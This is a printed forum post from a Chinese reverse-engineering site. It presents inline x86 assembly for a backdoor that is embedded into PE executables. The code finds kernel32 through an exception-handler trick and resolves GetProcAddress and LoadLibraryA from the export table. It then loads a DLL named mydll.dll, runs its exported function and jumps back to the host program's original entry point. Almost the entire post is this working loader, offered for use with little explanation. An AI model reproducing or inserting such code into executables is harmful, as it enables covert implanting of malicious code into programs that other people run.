滴水逆向联盟
标题:
PE可执行文件的镶入式程序后门开发
[打印本页]
作者:
大灰狼
时间:
2014-7-21 08:26
标题:
PE可执行文件的镶入式程序后门开发
/*
利用异常结构处理搜索GetProcAddress入口地址
*/
#include <STDIO.H>
#include <WINDOWS.H>
main()
{
_asm
{
call ex
//取得当前地址以计算异常结构开始的地址
mov eax,0x77000000
mov [ebp-0ch],eax
mov eax,esp
sub eax,8
xchg fs:[0],eax
mov
DWORD
ptr[ebp-00h],eax
mov eax,fs:[4]
mov
DWORD
ptr[ebp-04h],eax
mov fs:[4h],ebp
//保存ebp到fs:[4h]中
add ecx,34h
push ecx
push eax
mov edx,0
mov byte ptr [edx],0
//产生错误
}
//异常结构开始
_asm
{
mov ebp,fs:[4]
mov dword ptr [ebp-8h],0
//for(;imgbase<0xff000000,procgetadd==0;){
e104f:
cmp dword ptr [ebp-8h],0
jne exi
//imgbase+=0x10000;
mov eax,[ebp-0ch]
add eax,10000h
mov [ebp-0ch],eax
//if(imgbase==0x78000000) imgbase=0xbff00000;
cmp dword ptr [ebp-0ch],78000000h
jne is44
mov dword ptr [ebp-0ch],0BFF00000h
/*if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
*)(imgbase+0x3c))=='EP'){*/
is44:
mov ecx,dword ptr [ebp-0ch]
xor edx,edx
mov dx,word ptr [ecx]
mov dword ptr [ebp-24h],ecx
cmp edx,5A4Dh
//ZM
jne e11db
mov eax,[ebp-0ch]
mov ecx,dword ptr [eax+3Ch]
mov edx,dword ptr [ebp-0ch]
xor eax,eax
mov ax,word ptr [edx+ecx]
cmp eax,4550h
jne e11db
//fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
mov ecx,dword ptr [ebp-0ch]
mov edx,dword ptr [ecx+3Ch]
mov eax,[ebp-0ch]
mov ecx,dword ptr [eax+edx+78h]
add ecx,dword ptr [ebp-0ch]
mov dword ptr [ebp-10h],ecx
// k=*(int *)(fnbase+0xc)+imgbase;
mov edx,dword ptr [ebp-10h]
mov eax,dword ptr [edx+0Ch]
add eax,dword ptr [ebp-0ch]
mov dword ptr [ebp-14h],eax
//if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
mov ecx,dword ptr [ebp-14h]
cmp dword ptr [ecx],4E52454Bh
jne e11db
mov edx,dword ptr [ebp-14h]
cmp dword ptr [edx+4],32334C45h
jne e11db
//k=imgbase+*(int *)(fnbase+0x20);
mov eax,dword ptr [ebp-10h]
mov ecx,dword ptr [ebp-0ch]
add ecx,dword ptr [eax+20h]
mov dword ptr [ebp-14h],ecx
//for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
mov dword ptr [ebp-18h],0
jmp e1127
e1115:
mov edx,dword ptr [ebp-18h]
add edx,1
mov dword ptr [ebp-18h],edx
mov eax,dword ptr [ebp-14h]
add eax,4
mov dword ptr [ebp-14h],eax
e1127:
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ebp-18h]
cmp edx,dword ptr [ecx+18h]
jge e11db
/*if(*(int *)(imgbase+*(int *)k)=='tixE'&&*(int *)(4+imgbase+*(int
*)k)=='corP'){GetProcAddress*/
mov eax,dword ptr [ebp-14h]
mov ecx,dword ptr [eax]
mov edx,dword ptr [ebp-0ch]
cmp dword ptr [edx+ecx],
'PteG'
jne e11d6
mov eax,dword ptr [ebp-14h]
mov ecx,dword ptr [eax]
mov edx,dword ptr [ebp-0ch]
cmp dword ptr [edx+ecx+4],
'Acor'
jne e11d6
//k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
mov eax,dword ptr [ebp-18h]
add eax,dword ptr [ebp-18h]
add eax,dword ptr [ebp-0ch]
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ecx+24h]
xor ecx,ecx
mov cx,word ptr [eax+edx]
mov dword ptr [ebp-14h],ecx
//k+=*(int *)(fnbase+0x10)-1;
mov edx,dword ptr [ebp-10h]
mov eax,dword ptr [edx+10h]
mov ecx,dword ptr [ebp-14h]
lea edx,dword ptr [ecx+eax-1]
mov dword ptr [ebp-14h],edx
//k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
mov eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-0ch]
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ecx+1Ch]
mov eax,dword ptr [eax+edx]
mov dword ptr [ebp-14h],eax
mov edx,dword ptr [ebp-14h]
//add edx,imgbase
add edx,dword ptr [ebp-0ch]
// mov procgetadd,edx
mov dword ptr [ebp-8h],edx
//恢复异常结构
mov eax,
DWORD
ptr[ebp-00h]
mov fs:[0],eax
mov eax,
DWORD
ptr[ebp-04h]
mov fs:[4],eax
jmp e11db
e11d6:
jmp e1115
e11db:
jmp e104f
}
//////////////////////////////////////////////////////////////
exi:
//取得LoadLibraryA入口地址
_asm
{
mov dword ptr [ebp-124h],
'daoL'
mov dword ptr [ebp-120h],
'rbiL'
mov dword ptr [ebp-11Ch],
'Ayra'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
mov ebx,dword ptr [ebp-24h]
//kernel32.dll 入口地址
push ebx
mov eax,dword ptr [ebp-8h]
mov dword ptr [ebp-4008h],eax
//GetProcAddress 入口地址
call eax
mov dword ptr [ebp-400ch],eax
//LoadLibraryA 入口地址
}
//加载 mydll.dll
_asm
{
mov dword ptr [ebp-124h],
'ldym'
mov dword ptr [ebp-120h],
'ld.l'
mov dword ptr [ebp-11Ch],
'l'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
call dword ptr [ebp-400ch]
cmp eax,0
jz exit1
mov ebx,eax
//取得mybegin入口地址
mov dword ptr [ebp-124h],
'gebM'
mov dword ptr [ebp-120h],
'ni'
mov dword ptr [ebp-11Ch],0000h
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-4008h]
mov dword ptr [ebp-4030h],eax
//mybegin入口地址
cmp eax,0
jz exit1
call eax
//执行mybegin
jmp exit1
}
ex:
_asm
{
pop ecx
push ecx
ret
}
exit1:
_asm
{
mov eax,0x401000
//这个跳转地址在代码中需要更改
jmp eax
}
return
0;
}
欢迎光临 滴水逆向联盟 (http://dtdebug.com/)
Powered by Discuz! X3.2